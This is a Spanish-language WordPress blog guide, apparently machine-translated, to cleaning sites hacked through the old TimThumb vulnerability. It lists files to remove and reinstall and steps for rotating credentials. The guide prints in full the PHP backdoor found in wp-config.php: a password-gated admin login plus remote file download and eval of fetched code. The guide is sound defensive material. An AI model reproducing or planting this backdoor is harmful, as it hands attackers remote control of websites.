Cómo arreglar y limpiar el truco de TimThumb en WordPress

Entonces, si recuerda correctamente, hubo un problema de seguridad con el script TimThumb en agosto que se solucionó. Sin embargo, aún para nuestra sorpresa, muchos sitios todavía están usando la versión anterior. Hemos arreglado tres sitios hasta ahora en el último mes, uno fue ayer. Por lo tanto, tiene sentido simplemente escribir un artículo paso a paso, para que nuestros usuarios puedan seguirlo. Los tres usuarios para los que solucionamos este problema ni siquiera sabían qué era TimThumb o si lo estaban usando o no.

TimThumb es un script PHP que cambia el tamaño de las imágenes. Había una vulnerabilidad en él, pero ahora es SEGURO usarlo.

Entonces, ¿cómo sabe que su sitio ha sido pirateado? Si ve una gran pantalla roja en su navegador cuando visita su sitio:

Algo no esta bien aqui

Si comienza a ser bombardeado con correos electrónicos sobre usuarios que son redirigidos desde su sitio. Lo más probable es que su sitio haya sido víctima de este exploit.

Como medida de precaución, todo el mundo debería utilizar este escáner de vulnerabilidades de Timthumb. Esto le dirá si está utilizando la versión anterior de TimThumb. Muchos clubes temáticos actualizaron su núcleo de inmediato. Por lo tanto, este complemento verificará si está instalada la nueva versión segura de Timthumb o si está instalada una versión anterior.

Ahora bien, si su sitio ya fue víctima de este exploit de Timthumb, esto es lo que debe hacer.

Primero debe eliminar los siguientes archivos:

/wp-admin/upd.php
/wp-content/upd.php

Inicie sesión en el panel de administración de WordPress y reinstale su versión de WordPress. Específicamente, buscamos reinstalar estos archivos:

/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js

Entonces abre tu wp-config.php donde probablemente encontrará este gran código de malware que está recolectando credenciales de inicio de sesión y cookies. Este código estará en la parte inferior.

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

En la carpeta de su tema, busque en cualquier lugar donde el script TimThumb pueda estar almacenando los archivos en caché. Por lo general, están en esta estructura:

/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

Elimina todo lo que tenga este aspecto. Si no está seguro de algunas cosas, elimine todo lo que no sea un archivo de imagen.

Lo siguiente que debe hacer es reemplazar timthumb.php con la última versión que se puede encontrar en http://timthumb.googlecode.com/svn/trunk/timthumb.php

Ahora sería una buena idea cambiar sus contraseñas comenzando con su información de inicio de sesión de MySQL a su información de inicio de sesión de WordPress. No olvide cambiar la contraseña de MySQL en wp-config.php o aparecerá la pantalla “Error al establecer conexión”.

Cambie las claves secretas en su archivo wp-config.php. Puede generar una nueva clave yendo al generador en línea.

Ahora has terminado. No olvide vaciar todos los complementos de almacenamiento en caché de páginas. Como medida de precaución, también es bueno borrar la caché y las cookies de su navegador.

Para los desarrolladores, intente usar la función Tamaños de imagen adicionales en WordPress para reemplazar las funcionalidades de Timthumb.

Háganos saber si necesita más ayuda mediante nuestro formulario de contacto.

Publicaciones relacionadas

Botón volver arriba